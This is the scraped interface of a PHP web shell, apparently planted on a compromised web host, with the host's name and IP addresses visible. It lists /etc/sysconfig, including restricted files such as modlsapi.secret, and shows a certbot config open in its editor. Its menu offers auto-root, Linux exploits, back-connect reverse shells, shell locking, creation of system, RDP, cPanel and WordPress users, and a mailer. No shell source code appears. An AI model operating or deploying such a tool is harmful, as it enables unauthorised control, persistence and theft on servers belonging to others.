Linux clientvps21.redlake.in 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
LiteSpeed
: 95.216.48.241 | : 216.73.216.50
14 Domain
8.1.34
mydemowebs
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
sysconfig /
[ HOME SHELL ]
Name
Size
Permission
Action
console
[ DIR ]
drwxr-xr-x
kcare
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
network-scripts
[ DIR ]
drwxr-xr-x
anaconda
112
B
-rw-r--r--
atd
403
B
-rw-r--r--
certbot
1.73
KB
-rw-r--r--
chronyd
50
B
-rw-r--r--
cpupower
150
B
-rw-r--r--
crond
110
B
-rw-r--r--
dovecot
72
B
-rw-------
exim
142
B
-rw-r--r--
exim.rpmorig
21
B
-rw-r--r--
garb
560
B
-rw-r--r--
grub
298
B
-rw-r--r--
htcacheclean
350
B
-rw-r--r--
httpd
1.03
KB
-rw-r--r--
irqbalance
1.37
KB
-rw-r--r--
kdump
2.63
KB
-rw-r--r--
kernel
185
B
-rw-r--r--
lsapi-cache
158
B
-rw-r--r--
man-db
310
B
-rw-r--r--
modlsapi.secret
16
B
-r--------
named
845
B
-rw-r--r--
network
76
B
-rw-r--r--
nftables.conf
4.34
KB
-rw-------
qemu-ga
1.94
KB
-rw-r--r--
qemu-ga.bk
1.87
KB
-rw-r--r--
qemu-ga.rpmnew
1.91
KB
-rw-r--r--
rpcbind
73
B
-rw-r--r--
rsyslog
196
B
-rw-r--r--
run-parts
0
B
-rw-r--r--
samba
428
B
-rw-r--r--
selinux
1.16
KB
-rw-r--r--
smartmontools
201
B
-rw-r--r--
sshd
384
B
-rw-r-----
sysstat
1.63
KB
-rw-r--r--
sysstat.ioconf
6.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : certbot
## NOTE ## # If a hook is set here then it will be used for all # certificates and will override any per certificate # hook configuration in place. # Command to be run in a shell before obtaining any # certificates. Intended primarily for renewal, where it # can be used to temporarily shut down a webserver that # might conflict with the standalone plugin. This will # only be called if a certificate is actually to be # obtained/renewed. When renewing several certificates # that have identical pre-hooks, only the first will be # executed. # # An example to stop the MTA before updating certs would be # PRE_HOOK="--pre-hook 'systemctl stop postfix'" PRE_HOOK="" # Command to be run in a shell after attempting to # obtain/renew certificates. Can be used to deploy # renewed certificates, or to restart any servers that # were stopped by --pre-hook. This is only run if an # attempt was made to obtain/renew a certificate. If # multiple renewed certificates have identical post- # hooks, only one will be run. # # An example to restart httpd would be: # POST_HOOK="--post-hook 'systemctl restart httpd'" POST_HOOK="" # Command to be run in a shell once for each # successfully renewed certificate. For this command, # the shell variable $RENEWED_LINEAGE will point to the # config live subdirectory containing the new certs and # keys; the shell variable $RENEWED_DOMAINS will contain # a space-delimited list of renewed cert domains # # An example to run a script to alert each cert would be: # DEPLOY_HOOK="--deploy-hook /usr/local/bin/cert-notifier.sh" DEPLOY_HOOK="" # Any other misc arguments for the renewal # See certbot -h renew for full list # # An example to force renewal for certificates not due yet # CERTBOT_ARGS="--force-renewal" CERTBOT_ARGS=""
Close